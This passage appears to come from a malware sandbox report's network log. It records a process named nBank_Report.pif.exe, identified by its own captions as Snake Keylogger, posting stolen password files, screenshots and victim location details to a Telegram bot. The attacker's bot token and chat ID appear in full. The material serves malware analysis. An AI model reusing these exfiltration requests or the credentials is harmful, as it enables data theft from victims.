                                              2024-09-26 09:34:09 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:09 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:11 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:11 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.1049757149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:11 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce037aeec0960
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:11 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 33 37 61 65 65 63 30 39 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce037aeec0960Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:12 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:12 GMT
                                              Content-Type: application/json
                                              Content-Length: 506
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:12 UTC506INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6341,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343252,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.1049759149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:13 UTC718OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce04d8cc3fdb1
                                              Host: api.telegram.org
                                              Content-Length: 665843
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:13 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 34 64 38 63 63 33 66 64 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce04d8cc3fdb1Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:13 UTC16355OUTData Raw: e1 f7 3f bc f0 2b fd 23 be e6 21 f1 1c 8b 6b e8 5b 3d 48 1e 3c e3 f0 5b f3 5e ee 4d 8b f8 53 1c 46 e9 17 6f 03 b6 12 b0 87 c8 da ff fa be f4 43 da 21 ef 14 79 56 fa 81 e2 af 94 7e 60 be 10 6b f7 4a 3f df be d7 64 d1 a7 04 54 fe ad 3b 90 2a c3 56 f8 29 fd 9c a7 8f 10 44 ee 21 f5 38 fa ab dc a3 f5 18 b0 82 90 0a 41 25 20 28 0b b9 44 64 6d 7a 96 02 90 2a 40 aa 01 f3 78 b7 2f 64 99 a7 c0 53 f6 21 f7 a0 14 80 e6 ac db 37 7d f6 84 71 89 12 90 31 7b 20 fd 7c ff 5f ae 02 dc 25 cd 07 59 87 c0 8b e2 0e 91 86 38 43 00 22 d6 b8 dc 83 1c a0 df db f1 b2 be 14 44 fc 39 07 ac 27 16 8f 00 b3 47 94 72 0a 3c de 0d e8 33 44 c9 17 45 60 8c 43 14 80 b9 f2 6f 87 cb 06 6e 10 16 c6 c4 95 70 c8 35 a4 9a 30 06 04 9c 92 cf 1c 62 54 03 c6 5c 25 9e 28 f3 5c 1b c7 c2 18 99 07 ac 27 16
                                              Data Ascii: ?+#!k[=H<[^MSFoC!yV~`kJ?dT;*V)D!8A% (Ddmz*@x/dS!7}q1{ |_%Y8C"D9'Gr<3DE`Conp50bT\%(\'
                                              2024-09-26 09:34:13 UTC16355OUTData Raw: 20 ad 63 45 9d 72 8e 16 81 17 85 1e b1 72 9e 3e 6b 01 91 f7 cc bd af 9d 97 7a dd 9c 17 7d 30 56 12 d2 2a 03 c9 41 b2 49 94 77 42 5c 01 e7 78 ae 13 7e 71 ce 58 b9 1e 49 17 e7 a3 dc 43 fc 95 f9 e6 98 17 c7 ec e1 f3 b2 04 dc ba bd 7d b7 94 74 08 39 44 5f ac f4 8b 73 8a 3a fa 52 ae 83 28 0f 69 63 6e dc 2b 3e 3f e6 33 87 f4 43 02 4a 3c 06 9c c7 29 cf 23 c0 ca bf 2c f6 3a 90 7e c4 41 01 38 50 21 98 f6 89 02 10 e8 23 f7 c0 78 59 11 08 ac 5d 92 00 84 f2 9d 80 35 e9 57 f2 bf 7c e8 81 e6 79 e7 df d8 bc e7 a3 ff da 7c f4 a3 1f 6d 3e f2 91 8f 34 ff fc 2f ff da 5c 72 d9 17 9a eb 6e b8 b1 2a fe 64 29 02 10 e9 77 ea e9 67 36 27 9e 74 72 f3 96 b7 bc a5 e9 bd f7 7b cd cc a9 f7 37 bd 33 1f ca 72 ad 77 4e 27 00 cf 6e 65 df 82 36 51 0a b9 61 28 bc 6a b1 51 c4 fc 1a e4 9c 74
                                              Data Ascii: cErr>kz}0V*AIwB\x~qXIC}t9D_s:R(icn+>?3CJ<)#,:~A8P!#xY]5W|y|m>4/\rn*d)wg6'tr{73rwN'ne6Qa(jQt
                                              2024-09-26 09:34:13 UTC16355OUTData Raw: ed da 4a 3e e5 9f 22 0f 71 e7 11 5e 20 6e 1e 62 af 7c 47 a0 eb 84 1c 68 f7 61 bf 16 c5 5f fb ee c1 f4 f3 31 0e d2 ce be ef 01 54 d4 51 b9 d7 db 81 cb 40 2e 6b 66 76 fc 42 ff 18 2f 73 a5 14 04 c4 a0 fb d1 77 1c 73 69 d9 ab 94 73 51 08 2a f7 9c 53 be 01 63 a4 1d 39 b6 8a b9 28 ea e2 5e e0 3e e4 f9 9e 3f 9f e1 7a fa e4 c6 e7 95 30 07 f1 98 2e 02 ae 14 7c be a3 af 9c 57 f2 31 66 be 5f b1 c7 e7 e9 d6 ba 8e b6 26 f7 88 f5 b6 f9 7c 5e 43 df 1c f7 ce 7b 75 62 2f 8a be 18 8b b2 af cc 01 a5 1d b2 4e 01 48 8b c0 f3 f2 11 e4 5e 4d 00 ba 56 f9 e7 d8 77 00 66 31 c8 be 9d e8 43 00 c6 0b 40 a2 fc 73 1c 61 1d 28 0e dd 2b 32 5c 00 c6 db 6e 39 2a 8a 2c 4a 6c 79 de 3d 4d c3 cd b6 b9 92 89 0a ae f0 e7 ea b3 9a 1e 47 7c f3 a5 1b f3 7f 2e f8 f0 45 e9 3f 76 6d 15 60 96 28 be 4b
                                              Data Ascii: J>"q^ nb|Gha_1TQ@.kfvB/swsisQ*Sc9(^>?z0.|W1f_&|^C{ub/NH^MVwf1C@sa(+2\n9*,Jly=MG|.E?vm`(K
                                              2024-09-26 09:34:13 UTC16355OUTData Raw: 2c 95 80 67 22 df 1e 19 40 3f c5 6a e2 6e 26 00 eb 52 6f 1a 6a 52 6f 1a 6a 72 6f 29 d4 04 dd 5a 33 13 80 29 56 91 72 3b 92 99 00 4c eb 57 91 9a cc 5b 0e 35 f9 07 35 a9 37 0d 35 d9 57 a3 26 f5 a6 a1 26 ff a0 26 f9 26 d1 af c8 be 1a 3b 93 00 9c 31 e3 c5 62 a9 02 b0 c4 8b 40 94 7a e3 58 8a 00 2c 85 1f cf 17 e6 7b c7 dd 9a 65 1f 7d db fc 19 53 6e 29 00 91 7f 5e 0c a2 ac a3 25 0f 14 76 c4 a2 24 24 56 15 7b ed 9a 38 07 3e cb 23 c4 1e ff 55 02 2a 02 17 3b 02 5c 4a 41 88 39 b6 ce b9 8e be d2 8f 3e d2 cf 9c 21 82 d8 8b 10 47 00 c6 71 44 c1 67 b5 5f f9 fe 3f 24 20 ef f0 2b 2b fb 4a 19 58 ce 0b 72 90 23 c0 1e f1 45 00 fa de bf 28 04 e9 2b fc c8 35 df 7e 94 7a 56 00 46 e9 27 31 8f b1 39 4a 42 a4 1f ad 42 d1 58 94 76 54 ec 01 7d aa f8 60 9c 00 54 f0 99 4b 35 60 3c 12
                                              Data Ascii: ,g"@?jn&RojRojro)Z3)Vr;LW[5575W&&&&;1b@zX,{e}Sn)^%v$$V{8>#U*;\JA9>!GqDg_?$ ++JXr#E(+5~zVF'19JBBXvT}`TK5`<
                                              2024-09-26 09:34:13 UTC16355OUTData Raw: 8e 61 70 34 78 50 e9 27 51 fe 71 04 98 35 e4 21 fd bc f8 a3 94 81 c4 94 7f 0a 40 8f 04 23 e9 a2 00 44 dc 21 f7 40 d1 67 c5 9f b9 0a 3e e6 14 7e 11 e7 58 e3 05 20 8a c0 f8 4e 40 24 a0 32 2f 4a be 28 fa a8 f6 f3 b8 af 95 7f b6 39 17 f9 86 bc 43 c6 a5 36 0a 40 8f 05 5b 19 c8 7b 00 21 5f fe 91 c6 19 72 53 2b 8e 69 91 7a b1 1f e7 24 ca 3f f7 00 8f fc fa be 3e e5 1c 7d a5 1f e3 28 08 23 65 9e 31 f7 42 e0 b9 9f 63 73 68 19 9b c3 d8 7d 8c 0b 02 d0 4b 49 14 79 91 c5 04 a0 7d 88 02 90 b5 b4 a5 74 13 e4 5b 94 72 c8 40 ab fd 18 23 f7 14 81 e6 02 32 4f 01 58 ee c3 1a da 28 fd 7c d7 1f 71 89 79 0a ba 28 e5 1c 23 f8 14 77 4a bc 28 f2 68 cb e3 bf c4 4b 09 e8 3a 70 de 38 d2 2c 8a 36 65 9a 02 50 d1 67 ac 44 f1 e6 5a 21 ae dc 73 2e 3e 03 98 23 4f 61 e8 33 9c 67 bd eb c8 15
                                              Data Ascii: ap4xP'Qq5!@#D!@g>~X N@$2/J(9C6@[{!_rS+iz$?>}(#e1Bcsh}KIy}t[r@#2OX(|qy(#wJ(hK:p8,6ePgDZ!s.>#Oa3g
                                              2024-09-26 09:34:13 UTC16355OUTData Raw: 52 00 2a fe 80 7e 9c 8b 32 30 0a c0 48 14 77 e0 98 39 8e 00 1b 8f 73 93 88 f9 80 e8 e3 5d 7f b4 e6 28 04 f3 f3 5b 31 17 ab f8 68 91 81 b1 e2 4f a9 17 fb ae 71 9d f3 e0 3e 31 a6 1c 8c 82 d0 63 c0 a2 bc 43 e6 29 fb 44 d1 17 25 1f 2d f1 28 02 9d 07 2b ff 86 a5 df e0 18 f0 80 b4 a6 95 7d 40 3f 4a 41 04 a0 d2 4f 01 e8 1c ad c7 7e 15 7d 82 08 2c df 01 18 e5 9f 79 48 b9 28 f8 14 7e 56 f0 39 46 da 29 f2 88 2b f8 a2 04 54 ee d5 c6 ae 8d eb 99 e3 d2 0f 64 5f 14 80 4a 3f c6 5c 08 12 2f 05 29 05 a0 22 8f f7 fe 8d 7b 07 60 14 7c ca 3f e3 e6 c4 dc 28 00 73 f5 5e 8a 23 ef ca e3 bd 80 fc a3 ca b0 93 80 41 0e e6 a3 bf 81 2c 04 f7 be ba bb e8 23 0a 40 2b fd b2 d4 0b 92 0f f9 17 05 a0 c7 85 cd 41 ce 29 f8 14 7f f4 91 77 b4 08 bb 38 1f c7 4a 3e fa b4 9b 82 18 24 cf fd 88 1b
                                              Data Ascii: R*~20Hw9s]([1hOq>1cC)D%-(+}@?JAO~},yH(~V9F)+Td_J?\/)"{`|?(s^#A,#@+A)w8J>$
                                              2024-09-26 09:34:13 UTC16355OUTData Raw: fc 8f ec 7d dd 57 bd 67 44 1e f0 5e a9 c0 43 78 f1 99 bf f4 00 9f c4 7e d9 fb 27 6f d3 d3 2b 49 9a e5 5c 31 bf ed ab 6b 99 54 fd ca c2 8b cf bf f5 51 95 a0 7b 0d 15 80 5e 40 d5 82 49 02 2a c7 eb 9f 03 5f 35 7b 7c d8 de d3 5c 0a 40 c1 f1 68 bf bf 7d 8e fc f3 bf f4 e4 ea fd 70 04 f8 e3 3f aa d8 f7 c4 b4 f4 82 fb ec c7 bd 74 fc b3 b0 e6 4f ec bd 67 de 61 bf af bc 00 ec fe 75 d1 df fe c8 fe c3 7c 62 5d 21 e9 bf 9f 5e bf f4 5d b9 ef ad dd 4e 4b 79 11 7e 76 85 d4 1b 44 00 4e c8 55 ec 65 22 00 67 ba 47 28 fd 3c 81 f4 f3 84 d2 cf 13 48 b9 b9 64 5e 00 76 e3 05 5f a6 8f 00 ac e6 6d 0d 38 d1 d7 8b b2 32 10 da 6b ac 7f fe 33 69 e4 82 75 69 f4 33 cf 66 09 98 ab 02 dd cd c2 a3 6b 6c 7e 95 ad d7 fb cb b7 0b eb 56 e1 47 bb 91 d8 3b b3 aa 10 d4 b8 17 91 d4 eb 05 c7 8e c1
                                              Data Ascii: }WgD^Cx~'o+I\1kTQ{^@I*_5{|\@h}p?tOgau|b]!^]NKy~vDNUe"gG(<Hd^v_m82k3iui3fkl~VG;
                                              2024-09-26 09:34:13 UTC16355OUTData Raw: f4 43 e2 4f b9 b5 28 cc 37 f8 52 9d 27 ea 1b 7d 33 be 5f 52 ce 39 89 d8 15 d7 fe 27 5c 31 14 01 18 4a b4 1e f3 3e 1e cd 6f 08 44 52 6e 98 94 c2 2c ca 29 29 d7 bc 98 e9 7c 6e 6a 94 62 af 57 7c 22 f6 9d cd 80 48 fa f5 a3 14 73 53 8d cd 1c fb f3 13 10 c9 be 88 48 a8 4d 15 2f dc ba 62 08 2e 37 b7 5e 08 a4 de 20 44 d2 4e 64 41 17 c4 87 c9 dc 1f 19 2e b1 9f 69 c1 04 d9 37 05 3a 7d 8e 09 43 24 ff a0 79 96 60 0f bc cc 8b 88 04 df 94 41 fe b1 07 22 90 4a c0 5c 0d 68 7f a6 80 0b 44 a8 f6 ab e9 9c fb 4c 1a a1 02 70 d5 b3 69 01 37 09 af a9 aa 02 17 5d f0 6c 66 6c cd ba 7c a1 c8 82 f3 7e 9d bf 87 e6 22 91 53 1f 4d ad e5 06 cf 0e 0c 88 24 9f e4 5f e7 d4 c7 27 c4 9b b5 ec 79 f2 23 a1 dc 1b 84 48 f6 45 44 d2 6f 2a 44 d2 af 8b 48 1a 0e 42 21 fc a6 ca 6c 0a 40 c9 bf fd 8e
                                              Data Ascii: CO(7R'}3_R9'\1J>oDRn,))|njbW|"HsSHM/b.7^ DNdA.i7:}C$y`A"J\hDLpi7]lfl|~"SM$_'y#HEDo*DHB!l@
                                              2024-09-26 09:34:13 UTC16355OUTData Raw: f9 d9 62 eb 6e 3a 3d 68 6f f5 e7 99 68 ce d3 e4 f5 a0 bd 65 45 67 4b cb 0f d0 7c 2f 3a 93 c2 3e 51 3c a6 bd 45 cc 54 f3 4a 5a 6f fe 48 a6 3d 08 9b 7f b8 a1 63 63 e8 95 d7 d9 dc e6 8d f6 9b c6 fb 5d 10 17 6f fc d0 44 ea b9 91 1e 84 6b 1c 59 fe 6d 75 82 fd cf fe f9 a9 b3 ec 7b 69 e4 68 04 e0 3d a1 00 cc f4 10 80 59 e2 d9 58 02 50 42 d0 0b bf 52 00 d2 1f 54 00 fa e7 00 22 ee 54 cd 27 bc f0 2b 61 5e a2 4f 12 50 22 51 73 a5 00 d4 18 f9 d7 48 3f 8b fb 0a 40 84 5f 9e b7 be af 06 cc c2 d0 fa e3 cf fb 1b 67 32 01 c8 58 d5 7f a5 08 54 1e f1 46 02 52 f1 57 cb 3f 90 ec a3 ea 8f b9 36 c7 7e eb e7 00 d2 6f b9 1b 81 33 b5 bc a3 95 e0 2b e5 a0 24 9f 20 a6 1c 3f f6 31 2f fe 24 fd bc cc f3 15 7f e5 bc af 08 44 f6 95 cf 00 cc 7b 1c 5c 49 40 55 f8 21 f9 fc d1 5f 62 40 ac bd
                                              Data Ascii: bn:=hoheEgK|/:>Q<ETJZoH=cc]oDkYmu{ih=YXPBRT"T'+a^OP"QsH?@_g2XTFRW?6~o3+$ ?1/$D{\I@U!_b@
                                              2024-09-26 09:34:14 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:14 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.1049760149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:15 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce077de95b00f
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:15 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 37 37 64 65 39 35 62 30 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce077de95b00fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:15 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:15 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:15 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6343,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343255,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.1049761149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:16 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce0917098e23c
                                              Host: api.telegram.org
                                              Content-Length: 673762
